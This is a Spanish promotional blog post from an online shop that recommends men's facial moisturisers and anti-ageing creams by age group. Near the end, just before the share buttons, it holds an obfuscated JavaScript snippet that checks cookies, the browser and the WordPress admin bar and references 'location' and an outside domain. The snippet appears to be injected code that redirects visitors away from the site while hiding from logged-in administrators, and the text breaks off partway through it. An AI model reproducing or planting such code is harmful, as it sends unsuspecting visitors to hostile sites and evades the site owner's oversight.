cósmetica masculina online

Hoy queremos hablaros de los diferentes tratamientos faciales que podemos encontrar dentro de la cosmética masculina.

Porque cada piel a determinada edad tiene unas necesidades vamos a ayudaros a reconocer según las necesidades de vuestra piel cual es el tratamiento que más os conviene.

Hasta los 30 años nuestra piel requiere que la mantengamos hidratada y cuidada, seguir una rutina de limpieza e hidratación será básica para conservarnos estupendamente.

Una crema que nos proporcionará hidratación a la vez que nos ayudará a calmar nuestra piel con sus propiedades calmantes por su contenido en agua termal es Aquapower de Biotherm.

comprar aquapower biotherm

 

 

 

 

 

 

 

 

 

 

 

Su textura en gel, se absorbe enseguida lo que hace que no sea para nada engorrosa algo que se convierte en el momento de relax del día.

Si nuestra piel está muy deshidratada y necesitamos un extra de hidratación deberíamos probar con una crema aún más concentrada.

Shiseido Moisturizing Recovery Cream un tratamiento de choque para pieles muy castigadas que han sufrido las inclemencias de factores externos y las agresiones del afeitado. Hidrata intensamente la piel con una suave y confortable textura dejándola con un aspecto saludable y revitalizado. Repara la piel sensible al afeitado. Además previene las finas líneas de expresión causadas por la sequedad a la vez que repara la piel dañada. Su fragancia anti estrés ayuda a potenciar los beneficios del tratamiento.

shiseido-shiseido-men-moisturizing-recovery-cream

 

 

 

 

 

 

 

 

 

 

 

 

 

A partir de los 30 deberíamos comenzar con tratamientos antiedad que nos ayuden a prevenir la aparición de arruguitas y en el caso de que hayan comenzado a aparecer reducirlas.

Desde la casa Biotherm encontramos la gama Age Fitness en la que encontramos su crema de día Age Fitness Advanced Jour, y para aquellos que prefieren la noche para aplicarse su tratamiento Age Fitness Advanced Nuit.

Nos prometen que sólo en 8 días el tono de nuestra piel se restaura y tras 4 semanas de uso está más fuerte y más firme. Su refrescante textura en gel, deja la piel fresca, hidratada e increíblemente suave.

NYC3

 

Si lo que buscamos es algo más potente no debemos dejar de lado Skin Empowering Cream de Shiseido Men. La obra maestra de Shiseido, un potente tratamiento global que trabaja sobre todos los signos de envejecimiento de la piel: anti-edad arrugas, flacidez, aspereza, sequedad y tono apagado. Shiseido pone la ingeniería cosmética de alta tecnología para conceder al hombre el tratamiento anti-arrugas y firmeza más potente. Todo un cóctel de nutrientes para nuestra piel.

shiseido-shiseido-men-skin-empowering-cream

 

 

 

 

 

 

 

 

 

 

 

  • Redensifica y aporta energía celular (Carnosine DP).
  • Revitaliza y elimina los signos de fatiga.
  • Minimiza las arrugas y las líneas de expresión.
  • Reafirma el contorno facial.
  • Mejora la textura de la piel.
  • Minimiza la apariencia de los poros dilatados.
  • No comedogénico. Testado dermatológicamente.
  • Fragancia aromacológica antiestrés.

Hay multitud de cremas que pueden irnos bien, por ello si necesitáis ayuda a la hora de encontrar el tratamiento que mejor os convenga os recordamos que tenéis a vuestra disposición nuestro servicio de esteticista online donde nuestra experta estará encargada de responderos a vuestras preguntas y ayudaros en lo que necesitéis.

¿Cuéntanos que cremas faciales utilizas? ¿Qué le pides a tu crema facial?

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone